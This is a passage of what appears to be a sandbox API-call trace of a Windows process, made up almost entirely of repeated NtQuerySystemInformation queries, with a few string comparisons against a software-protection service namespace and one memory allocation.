NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x28, ResultLength=0x0) [0233.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x28, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0233.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x20, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x20, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x28, ResultLength=0x0) [0233.452] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da50, Length=0x28, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x28, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x28, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x20, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x20, ResultLength=0x0) [0233.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x28, ResultLength=0x0) [0233.494] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc80, Length=0x50, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x28, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da50, Length=0x28, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x28, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x28, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x20, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbb0, Length=0x38, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x20, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x20, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x48, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x48, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x2026d7ab960 [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x20, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x20, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x20, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x20, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x28, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x48, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc30, Length=0x20, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc30, Length=0x20, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcc8, Length=0x28, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x40, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x20, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.514] NtQuerySystemInformation (SystemInformationClass=0xb9, 